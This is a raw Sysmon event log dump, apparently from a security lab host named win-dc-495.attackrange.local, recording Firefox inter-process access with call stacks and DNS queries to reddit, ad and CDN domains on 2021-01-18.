Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.892{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.892{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.885{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program 
Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.884{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:24.864{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.863{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.859{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.856{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.855{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.952{59A5CD1D-8E56-6005-2E00-00000000A301}2464192.174.198.91.in-addr.arpa.0type: 12 text-lb.esams.wikimedia.org;C:\Windows\sysmon64.exe 
22542200x800000000000000017593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.952{59A5CD1D-8E56-6005-2E00-00000000A301}24645.20.240.157.in-addr.arpa.0type: 12 edge-atlas-shv-02-frt3.facebook.com;C:\Windows\sysmon64.exe 22542200x800000000000000017629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.681{59A5CD1D-945A-6005-3305-00000000A301}7052b.thumbs.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.680{59A5CD1D-945A-6005-3305-00000000A301}7052external-preview.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.676{59A5CD1D-945A-6005-3305-00000000A301}7052styles.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.676{59A5CD1D-945A-6005-3305-00000000A301}7052preview.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.671{59A5CD1D-945A-6005-3305-00000000A301}7052www.redditstatic.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:23.961{59A5CD1D-8E56-6005-2E00-00000000A301}2464140.113.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000017623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:25.461{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.461{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.460{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.179{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.170{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.156{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.140{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.067{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.052{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052d1ykf07e75w7ss.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052c.aaxads.com0type: 5 wildcard.aaxads.com.edgekey.net;type: 5 e12767.d.akamaiedge.net;::ffff:104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.607{59A5CD1D-945A-6005-3305-00000000A301}7052d1ykf07e75w7ss.cloudfront.net099.84.88.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.606{59A5CD1D-945A-6005-3305-00000000A301}7052c.amazon-adsystem.com0type: 5 
d1ykf07e75w7ss.cloudfront.net;::ffff:99.84.88.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.605{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagservices.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.685{59A5CD1D-945A-6005-3305-00000000A301}7052a.thumbs.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.543{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.535{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.371{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.365{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.350{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
